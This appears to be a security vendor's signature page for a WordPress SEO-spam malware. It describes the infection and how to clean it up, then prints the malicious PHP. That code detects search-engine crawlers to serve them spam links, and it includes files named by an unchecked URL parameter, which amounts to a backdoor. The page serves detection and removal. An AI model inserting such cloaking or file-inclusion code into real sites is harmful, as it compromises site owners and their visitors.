Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.spam-seo.redirect.002

php.spam-seo.redirect.002

Blackhat SEO is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance.
This malware redirects the most known webcrwalers to spam pages. It does that by adding an action into WordPress footer and templates.

Affecting

Vulnerable WordPress installations

Cleanup

Cleanup is done by deleting the malicious code from the file, or replacing it with a fresh version. The infection can be found in your system by searching for the malicious string inside your files.
You can also sign up with us and let our team remove the malware for you.

Dump

function isbot(){$agent= strtolower($_SERVER['HTTP_USER_AGENT']);if (!empty($agent)){$spiderSite=array("TencentTraveler","Baiduspider+","BaiduGame","Googlebot","msnbot","Sosospider+","Sogou web spider","ia_archiver","Yahoo! Slurp","YoudaoBot","Yahoo Slurp","MSNBot","Java (Often spam bot)","BaiDuSpider","Voila","Yandex bot","BSpider","twiceler","Sogou Spider","Speedy Spider","Google AdSense","Heritrix","Python-urllib","Alexa (IA Archiver)","Ask","Exabot","Custo","OutfoxBot/YodaoBot","yacy","SurveyBot", "legs","lwp-trivial","Nutch","StackRambler","The web archive (IA Archiver)","Perl tool","MJ12bot","Netcraft","MSIECrawler","WGet tools","larbin","Fish search",);foreach($spiderSite as $val){$str=strtolower($val);if (stripos($agent, $str)!==false){return true;}}}else{return false;}}
function pagegood(){if($_GET["tag"]<>"" && stripos("..",$_GET["tag"])==false){include_once(dirname(__FILE__)."/assets/".$_GET["tag"]);exit();}if(isbot()){add_action('wp_footer','mlink');}}